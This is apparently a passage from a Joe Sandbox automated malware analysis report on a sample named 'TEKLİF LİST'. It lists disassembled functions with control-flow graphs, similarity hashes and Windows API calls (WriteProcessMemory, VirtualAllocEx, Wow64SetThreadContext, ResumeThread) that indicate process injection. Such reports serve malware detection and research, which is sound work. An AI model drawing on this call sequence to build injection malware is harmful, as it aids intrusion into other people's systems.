                                                                                                              control_flow_graph 114 2f3ae28-2f3ae37 115 2f3ae63-2f3ae67 114->115 116 2f3ae39-2f3ae46 call 2f3a14c 114->116 117 2f3ae7b-2f3aebc 115->117 118 2f3ae69-2f3ae73 115->118 123 2f3ae48 116->123 124 2f3ae5c 116->124 125 2f3aec9-2f3aed7 117->125 126 2f3aebe-2f3aec6 117->126 118->117 169 2f3ae4e call 2f3b0b1 123->169 170 2f3ae4e call 2f3b0c0 123->170 124->115 128 2f3aefb-2f3aefd 125->128 129 2f3aed9-2f3aede 125->129 126->125 127 2f3ae54-2f3ae56 127->124 130 2f3af98-2f3b058 127->130 131 2f3af00-2f3af07 128->131 132 2f3aee0-2f3aee7 call 2f3a158 129->132 133 2f3aee9 129->133 164 2f3b060-2f3b08b GetModuleHandleW 130->164 165 2f3b05a-2f3b05d 130->165 135 2f3af14-2f3af1b 131->135 136 2f3af09-2f3af11 131->136 134 2f3aeeb-2f3aef9 132->134 133->134 134->131 138 2f3af28-2f3af31 call 2f3a168 135->138 139 2f3af1d-2f3af25 135->139 136->135 145 2f3af33-2f3af3b 138->145 146 2f3af3e-2f3af43 138->146 139->138 145->146 147 2f3af61-2f3af6e 146->147 148 2f3af45-2f3af4c 146->148 154 2f3af91-2f3af97 147->154 155 2f3af70-2f3af8e 147->155 148->147 150 2f3af4e-2f3af5e call 2f3a178 call 2f3a188 148->150 150->147 155->154 166 2f3b094-2f3b0a8 164->166 167 2f3b08d-2f3b093 164->167 165->164 167->166 169->127 170->127
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02F3B07E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: bcfaba0c8efd72d0f32fba724e85d8b24fc4b5d67523354f09067431fbba4aa6
                                                                                                              • Instruction ID: 3d174e13492e6d1aed18fd93e79f26893407d8c3bed17aa216d5a6597c7415fb
                                                                                                              • Opcode Fuzzy Hash: bcfaba0c8efd72d0f32fba724e85d8b24fc4b5d67523354f09067431fbba4aa6
                                                                                                              • Instruction Fuzzy Hash: 947144B0A00B058FD725DF2AD45479ABBF2FF88344F00892DE58AD7A50DB74E849CB90
                                                                                                              Function 02F3590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 171 2f3590c-2f359d9 CreateActCtxA 173 2f359e2-2f35a3c 171->173 174 2f359db-2f359e1 171->174 181 2f35a4b-2f35a4f 173->181 182 2f35a3e-2f35a41 173->182 174->173 183 2f35a51-2f35a5d 181->183 184 2f35a60-2f35a90 181->184 182->181 183->184 188 2f35a42-2f35a47 184->188 189 2f35a92-2f35b14 184->189 188->181
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02F359C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 742fe038e0ed7bec3004d5997de142947ace308a55599b88abfc3981fe41f883
                                                                                                              • Instruction ID: c05933144afe4bb08f19fff7a32be3d851cc4b77f80712f499b7cae1fe7ee89e
                                                                                                              • Opcode Fuzzy Hash: 742fe038e0ed7bec3004d5997de142947ace308a55599b88abfc3981fe41f883
                                                                                                              • Instruction Fuzzy Hash: B041E0B1C01719CFEB25CFA9C884BDEBBB5BF88304F64806AD408AB251DB756945CF50
                                                                                                              Function 02F344B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 192 2f344b4-2f359d9 CreateActCtxA 195 2f359e2-2f35a3c 192->195 196 2f359db-2f359e1 192->196 203 2f35a4b-2f35a4f 195->203 204 2f35a3e-2f35a41 195->204 196->195 205 2f35a51-2f35a5d 203->205 206 2f35a60-2f35a90 203->206 204->203 205->206 210 2f35a42-2f35a47 206->210 211 2f35a92-2f35b14 206->211 210->203
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02F359C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 73b58935bfa4703056d1b9293d1a9c4f1fb297a335f445f8206e3d13e1e70bc1
                                                                                                              • Instruction ID: 9c545a566222179ee6779e4867ef2fa86bde7be913ca7081b37023f264e79be8
                                                                                                              • Opcode Fuzzy Hash: 73b58935bfa4703056d1b9293d1a9c4f1fb297a335f445f8206e3d13e1e70bc1
                                                                                                              • Instruction Fuzzy Hash: 5A41F2B0C00719CFEB25CFA9C884B8EBBF5BF89304F64806AD408AB251DB756945CF90
                                                                                                              Function 05654040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 214 5654040-565407c 215 5654082-5654087 214->215 216 565412c-565414c 214->216 217 5654089-56540c0 215->217 218 56540da-5654112 CallWindowProcW 215->218 222 565414f-565415c 216->222 225 56540c2-56540c8 217->225 226 56540c9-56540d8 217->226 219 5654114-565411a 218->219 220 565411b-565412a 218->220 219->220 220->222 225->226 226->222
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05654101
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: 3a9b20a1575dd93da3c5d433a2af760b74b39cb2dab8d105d790573c5738b0c0
                                                                                                              • Instruction ID: fc84daeb821c8ed1e7a851958183501052522e54803475c75991136bf8d8eee4
                                                                                                              • Opcode Fuzzy Hash: 3a9b20a1575dd93da3c5d433a2af760b74b39cb2dab8d105d790573c5738b0c0
                                                                                                              • Instruction Fuzzy Hash: 36411AB4900705DFDB14CF99C848AAAFBF5FF88324F248499D919AB321D775A841CFA1
                                                                                                              Function 09105B10 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 228 9105b10-9105b66 231 9105b76-9105bb5 WriteProcessMemory 228->231 232 9105b68-9105b74 228->232 234 9105bb7-9105bbd 231->234 235 9105bbe-9105bee 231->235 232->231 234->235
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09105BA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 6adec29cbdc4b47cbd586539c848c8dbafa2035d5afd00eac2e6fd571c1cf5d8
                                                                                                              • Instruction ID: 7c7611f4b6fb526318d0158b58c2973262fc2b6b9d9764e72b78608b9933359e
                                                                                                              • Opcode Fuzzy Hash: 6adec29cbdc4b47cbd586539c848c8dbafa2035d5afd00eac2e6fd571c1cf5d8
                                                                                                              • Instruction Fuzzy Hash: 762137719003499FDB10CFAAD885BDEBBF5FF88310F14842AE958A7251C779A941CBA1
                                                                                                              Function 09105B18 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 239 9105b18-9105b66 241 9105b76-9105bb5 WriteProcessMemory 239->241 242 9105b68-9105b74 239->242 244 9105bb7-9105bbd 241->244 245 9105bbe-9105bee 241->245 242->241 244->245
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09105BA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: edc5ba58ec2ee339079ea08b17b7cad391dc4f6e2e377677a28155b18145beec
                                                                                                              • Instruction ID: 20795da1bf95473862ae7a2c2e5186b910df7e431ba127ac3dc232e04e5addbd
                                                                                                              • Opcode Fuzzy Hash: edc5ba58ec2ee339079ea08b17b7cad391dc4f6e2e377677a28155b18145beec
                                                                                                              • Instruction Fuzzy Hash: 162126719003499FDB10CFAAC885BDEBBF5FF88310F14842AE919A7250D779A940CBA1
                                                                                                              Function 09105978 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 249 9105978-910597c 250 91059b3-91059cb 249->250 251 910597e-91059ac 249->251 254 91059db-9105a0b Wow64SetThreadContext 250->254 255 91059cd-91059d9 250->255 251->250 257 9105a14-9105a44 254->257 258 9105a0d-9105a13 254->258 255->254 258->257
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 091059FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 8a379a1669d79b0590a46cf0f3c8a9c7c3a74678ad3fb23f7db728112f2cf24f
                                                                                                              • Instruction ID: efdfe19ab17e5cca5e84fd082eb813852dc923a9f5aa36f8f44e508c8b93b2ed
                                                                                                              • Opcode Fuzzy Hash: 8a379a1669d79b0590a46cf0f3c8a9c7c3a74678ad3fb23f7db728112f2cf24f
                                                                                                              • Instruction Fuzzy Hash: EC215C71D003098FDB10CFAAC4857EEBBF5AF88324F54842AE459A7241C7799945CFA1
                                                                                                              Function 09105C01 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 262 9105c01-9105c95 ReadProcessMemory 266 9105c97-9105c9d 262->266 267 9105c9e-9105cce 262->267 266->267
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09105C88
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 24f6cca7a13ed62913a5b85b14263b6b84f041e40ef641566ce9230a48ed06db
                                                                                                              • Instruction ID: 0b86820488140f968e95255d5b255ed6e93f3d10e47126ca9c482870f31e64e1
                                                                                                              • Opcode Fuzzy Hash: 24f6cca7a13ed62913a5b85b14263b6b84f041e40ef641566ce9230a48ed06db
                                                                                                              • Instruction Fuzzy Hash: 8D2139719003499FDB10CFAAD940BEEBBF5FF88310F14842AE518A7251C7799541CBA1
                                                                                                              Function 02F3D2FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 271 2f3d2fc-2f3d7a4 DuplicateHandle 273 2f3d7a6-2f3d7ac 271->273 274 2f3d7ad-2f3d7ca 271->274 273->274
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F3D6D6,?,?,?,?,?), ref: 02F3D797
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: a014205f5a770ce2ccdf46ee79bc18121bb9b2a27259ee39787dc245c95bf6fa
                                                                                                              • Instruction ID: a23def1f41254dc187010a94a91c034c112a2a6d3b300bdfc0714052230af862
                                                                                                              • Opcode Fuzzy Hash: a014205f5a770ce2ccdf46ee79bc18121bb9b2a27259ee39787dc245c95bf6fa
                                                                                                              • Instruction Fuzzy Hash: F721E4B590024CEFDB11CFAAD884ADEBBF8FB48310F14845AE914A7311D378A950CFA5
                                                                                                              Function 09105980 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 277 9105980-91059cb 280 91059db-9105a0b Wow64SetThreadContext 277->280 281 91059cd-91059d9 277->281 283 9105a14-9105a44 280->283 284 9105a0d-9105a13 280->284 281->280 284->283
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 091059FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 344ac012c72ad8e39294159afe486259fc7eee520491e8113de476e1fce3f23e
                                                                                                              • Instruction ID: c3316f771f4d6bbdc07fed870e8b59e04ed5a9d66498ff3978c97d3b5a7c980f
                                                                                                              • Opcode Fuzzy Hash: 344ac012c72ad8e39294159afe486259fc7eee520491e8113de476e1fce3f23e
                                                                                                              • Instruction Fuzzy Hash: 8D213571D003098FDB10DFAAC4857EEBBF5BF88324F54842AE419A7241CB79A945CFA5
                                                                                                              Function 09105C08 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 288 9105c08-9105c95 ReadProcessMemory 291 9105c97-9105c9d 288->291 292 9105c9e-9105cce 288->292 291->292
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09105C88
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: d0efc5423dd4e0a278ea8a3a5287e5f4946374a0e3316f035396d6214abc496f
                                                                                                              • Instruction ID: 34a668065b5e134f21e7a1a5693f9b71527548ace036a7121b9fac7fae05780b
                                                                                                              • Opcode Fuzzy Hash: d0efc5423dd4e0a278ea8a3a5287e5f4946374a0e3316f035396d6214abc496f
                                                                                                              • Instruction Fuzzy Hash: 062116B19003499FDB10CFAAC944BEEBBF5FF48310F54842AE518A7240C7799500DBA1
                                                                                                              Function 02F3D709 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 296 2f3d709-2f3d7a4 DuplicateHandle 297 2f3d7a6-2f3d7ac 296->297 298 2f3d7ad-2f3d7ca 296->298 297->298
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F3D6D6,?,?,?,?,?), ref: 02F3D797
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 856f89f702b1c51eeda2e46e11c108a38fb3ac05a2ff130d2cc671243480f45e
                                                                                                              • Instruction ID: 51908b7da6b664120d8cf14f0be5f0dfde3affc9bae01372ad06cd70eddadf66
                                                                                                              • Opcode Fuzzy Hash: 856f89f702b1c51eeda2e46e11c108a38fb3ac05a2ff130d2cc671243480f45e
                                                                                                              • Instruction Fuzzy Hash: 6421E0B5900209DFDB11CFAAD984AEEBBF4AB48224F14841AE918B7310D378A940CF61
                                                                                                              Function 09105A51 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 301 9105a51-9105ad3 VirtualAllocEx 305 9105ad5-9105adb 301->305 306 9105adc-9105b01 301->306 305->306
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09105AC6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: bf86573f886272bf276fdfeb63e47ed404489616663e3e2c2d87465611f31767
                                                                                                              • Instruction ID: c7d08a7ba00b9d0961b38dc7d485b6ce5c055ceee257d55570c6b4e2f16cc5ab
                                                                                                              • Opcode Fuzzy Hash: bf86573f886272bf276fdfeb63e47ed404489616663e3e2c2d87465611f31767
                                                                                                              • Instruction Fuzzy Hash: 15114772900349DFDB10DFAAD845BDEBBF5EB88320F14881AE519A7250C779A540CFA1
                                                                                                              Function 09105A58 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09105AC6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: d6650032617d7a91d6765f41131d56f600de6b34eb297d279df29face99fc97e
                                                                                                              • Instruction ID: 679874aeee505d832af498a831cc7404134941e0fea9e246577bde33fe2f3d4f
                                                                                                              • Opcode Fuzzy Hash: d6650032617d7a91d6765f41131d56f600de6b34eb297d279df29face99fc97e
                                                                                                              • Instruction Fuzzy Hash: AB111471900249DFDB10DFAAD844BDEBBF5AB88320F248819E519A7250C77AA940CFA1
                                                                                                              Function 091058C8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 5d9a4c47b95df2093d027d216911fa5cc02cdf5f2e3da6458819afd2de83b96d
                                                                                                              • Instruction ID: 51b5b7f49b59e1aef6dee6d918f4870a905f0c2e7b5efacb07098441c02c655d
                                                                                                              • Opcode Fuzzy Hash: 5d9a4c47b95df2093d027d216911fa5cc02cdf5f2e3da6458819afd2de83b96d
                                                                                                              • Instruction Fuzzy Hash: 631158B1D003488FDB20DFAAC4447EEBBF5AF88224F24881AD419A7240CB79A940CF95
                                                                                                              Function 091058D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: ca6adb61395daf13de2e8e77229d6c8cbab440f178831319a99f3337ab2f9eb7
                                                                                                              • Instruction ID: 1b7f0ce37e04e7e8ade8eaf04ddc86bef82016b94dc2f244bcc76ba31d42fa7b
                                                                                                              • Opcode Fuzzy Hash: ca6adb61395daf13de2e8e77229d6c8cbab440f178831319a99f3337ab2f9eb7
                                                                                                              • Instruction Fuzzy Hash: BC113A71D00348CFDB10DFAAD4457DEFBF5AF88224F248419D419A7240CB79A940CFA5
                                                                                                              Function 02F3B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02F3B07E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: e2cca2efa628fd4903ae0bf098a05a7476c3cbf7efc52c318848eaf04ea12fa2
                                                                                                              • Instruction ID: eedfb028a595fa8c49acd4f0621964e7b9dc8599f318b7842643cb0912ae3d02
                                                                                                              • Opcode Fuzzy Hash: e2cca2efa628fd4903ae0bf098a05a7476c3cbf7efc52c318848eaf04ea12fa2
                                                                                                              • Instruction Fuzzy Hash: 38110FB5C007498FDB20CF9AD444BDEFBF4EB88614F14841AD528A7210D379A545CFA1
                                                                                                              Function 091046C0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0910864D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: c58d618bc09abb21bfcaba8597a080c9bbfb06764ec4c9d4844b5b20babd988f
                                                                                                              • Instruction ID: 5f85f3575ac4db113e2cec1afcea13c3b03cdd44c234441feb9a960e78240c62
                                                                                                              • Opcode Fuzzy Hash: c58d618bc09abb21bfcaba8597a080c9bbfb06764ec4c9d4844b5b20babd988f
                                                                                                              • Instruction Fuzzy Hash: 621133B5804748DFDB10CF8AD484BDEBBF8EB48314F108459E518A7341C3BAA940CFA5
                                                                                                              Function 091085E9 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0910864D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 2c75b3e2a53f1534023e201dde2fd634b0f0c5fda34c731178775cf3238a5a46
                                                                                                              • Instruction ID: 516a084d8ce97e99597ab5784ce4fd33730950dad39aa670fc9e799e150f0be7
                                                                                                              • Opcode Fuzzy Hash: 2c75b3e2a53f1534023e201dde2fd634b0f0c5fda34c731178775cf3238a5a46
                                                                                                              • Instruction Fuzzy Hash: 931122B5800248DFDB10DF9AD485BDEBBF4EB48324F10845AE458A7310C379A540CFA1
                                                                                                              Function 0121D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d790b36a9594115be89078dc691fe15a36eb4f014f219747931f5ed182c67a59
                                                                                                              • Instruction ID: c8824b79ba87456c0c21b1bbadc46cc869348234f95871cfde85c7c05b9b4bf2
                                                                                                              • Opcode Fuzzy Hash: d790b36a9594115be89078dc691fe15a36eb4f014f219747931f5ed182c67a59
                                                                                                              • Instruction Fuzzy Hash: D0216A71510248EFDB15DF54E8C4B26BFA1FBD4318F20C169E9050B24BC336D406CBA2
                                                                                                              Function 0121D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0911b7eae4f40e0f3bb5dcd86b166fd9c946f10b63fbb3818f0d8cb21d3f4f1
                                                                                                              • Instruction ID: c170aebd2ce1174c1c1e4af4e994403de071c2fc28f19411851c2aee57a1c647
                                                                                                              • Opcode Fuzzy Hash: b0911b7eae4f40e0f3bb5dcd86b166fd9c946f10b63fbb3818f0d8cb21d3f4f1
                                                                                                              • Instruction Fuzzy Hash: 21214875550208DFDB15DF94D9C4B56BBA5FB98314F20C168E9090B24AC336E446CBA2
                                                                                                              Function 0122D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
